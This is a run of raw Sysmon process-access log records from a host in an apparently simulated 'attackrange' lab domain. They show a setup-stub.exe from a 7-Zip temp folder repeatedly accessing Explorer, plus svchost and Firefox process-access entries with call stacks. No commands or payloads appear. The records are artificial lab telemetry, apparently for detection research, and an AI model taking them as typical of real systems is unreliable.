13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.989{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.989{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.521{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+8f59|C:\Program Files\Mozilla Firefox\firefox.exe+10f9|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 